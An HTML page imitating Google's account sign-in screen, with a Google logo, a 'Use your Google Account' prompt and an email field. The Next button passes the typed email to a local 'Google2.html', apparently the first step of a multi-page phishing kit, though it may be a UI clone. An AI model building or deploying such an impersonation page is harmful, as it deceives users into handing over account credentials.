<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Google Login</title>

  <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;600&display=swap" rel="stylesheet">

  <style>
    body {
      margin: 0;
      padding: 0;
      font-family: 'Montserrat', sans-serif;
      background-color: #ecf2f7;
    }

    .login-container {  
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      width: 100%;
    }

    .login-box {
      border-radius: 25px;
      background-color: white;
      padding: 30px;
      width: 980px;
      max-width: 95%;
      box-sizing: border-box;
      height: 350px;
      flex-direction: row;
      display: flex;
      justify-content: space-between;
      align-items: flex-start;
    }

    .img-logo{
      height: 43px;
      width: 43px;
      margin-bottom: 0px;
      margin-top: 0px;
      margin-left: 15px;
    }

    h2 {
      font-size: 40px;
      color: #333;
      text-align: left;
      display: flex;
      flex-direction: row;
      width: 200px;
      padding-top: 0px;
      padding-bottom: 0px;
      margin-top: 21px;
      margin-bottom: 0px;
      margin-left: 10px;
      font-weight: 500;
    }

    .Use-account{
      margin-top: 15px;
      margin-left: 8px;
      font-size: 16px;
    }

    
    .left-side{

      width:250px;
      height:auto;
    }


    form {
      display: flex;
      flex-direction: column;
      align-items: flex-end;
      width: 450px;
      float: right;
      margin-top: auto;
    }

    .input-group {
      margin-bottom: 0px;
      width: 400px;
    }

    fieldset {
      border: solid #2f2c2c 1px;
      border-radius: 5px;
      background-color: #ffffff;
      padding: 0;
    }

    legend {
      font-size: 14px;
      color: #555;
      padding: 0 5px;
    }

    input[type="email"] {
      width: 100%;
      height: 40px;
      padding: 0 10px;
      border: none;
      background-color: white;
      font-size: 16px;
      box-sizing: border-box;
    }

    input[type="email"]:focus {
      outline: none;
    }

    input[type="email"]:-webkit-autofill {
      background-color: white !important;
      -webkit-box-shadow: 0 0 0px 1000px white inset !important;
      box-shadow: 0 0 0px 1000px white inset !important;
      -webkit-text-fill-color: #000 !important;
      transition: background-color 9999s ease-in-out 0s;
    }

    a:link{
      text-decoration: none;
      font-size: 14px;
    } 
    
    a:hover{
      text-decoration: none !important;
    } 

    .form-links {
      display: flex;
      justify-content: space-between;
      align-items: center;
      width: 400px;
      margin-top: 10px;
    }

    .form-links a {
      color: rgb(5, 104, 198);
      font-weight: 600;
      text-decoration: none;
      font-size: 14px;
    }

    
    .guest-text-box{
      margin-right: 5px;
      margin-top: 40px;
      margin-bottom: 20px;
    }

    .p-Guest-para{
      font-size: 14px;
    }
    
    .lower-button{
      display: flex;
      flex-direction: row;
    }

    .create-account{
      margin-top: 9px;
      margin-right: 40px;
      color: rgb(5, 104, 198);
      font-weight: 600;
      text-decoration: none;
      font-size: 14px;
    }

    .next-button {
      background-color: rgb(5, 104, 198);
      color: white;
      font-size: 14px;
      font-weight: lighter;
      border: none;
      border-radius: 5px;
      padding: 10px 20px;
      cursor: pointer;
      border-radius: 40px;
      width: 85px;
    }

    .next-button:hover {
      background-color: rgb(3, 80, 150);
    }
  </style>
</head>
<body>
  <div class="login-container">
    <div class="login-box">
      <div class="left-side">
              
        <div class="img-logo">
          <img src="Google.jpeg"/>
            </div>
              <h2>Sign in</h2>
              <p class="Use-account">Use your Google Account</p>
            </div>
            
          <form action="#" method="POST">
            <div class="input-group">
              <fieldset>
                <legend>Email or phone</legend>
                <input type="email" id="email" name="email" required />
              </fieldset>
            </div>

            <div class="form-links">
              <a href="https://accounts.google.com/signin/v2/usernamerecovery?continue=https%3A%2F%2Faccounts.google.com%2Fsignin%2Fchrome%2Fsync%2Ffinish%3Fest%3DAJeVM-tEHReRmSmN0PtObR6XVisxm8_M_uEeSb3o_vmys4uqvULyfQniXPJaNgrI9lUS1N7WUb6PT2WPqqp5mL8%26continue%3Dhttps%3A%2F%2Fwww.google.com%2F&dsh=S1193785894%3A1744871101573193&flowName=GlifDesktopChromeSync&ddm=1">Forgot email?</a>
            </div>
            <div class="guest-text-box">
              <p class="p-Guest-para">Not your computer? Use Guest mode to sign in privately</p>
            </div>
            <div class="lower-button">
            <a class="create-account" href="https://accounts.google.com/lifecycle/steps/signup/">Create account</a>
            <button type="button" class="next-button" onclick="handleNext()">Next</button>
            </div>
          </form>
      </div>
      
  </div>

</div>
</div>
  <script>
    function handleNext() {
      var email = document.getElementById("email").value.trim();
      if (email !== "") {
        window.location.href = 'Google2.html?email=' + encodeURIComponent(email);
      } else {
        alert("Please enter your email");
      }
    }
  </script>
  
  
</body>
</html>
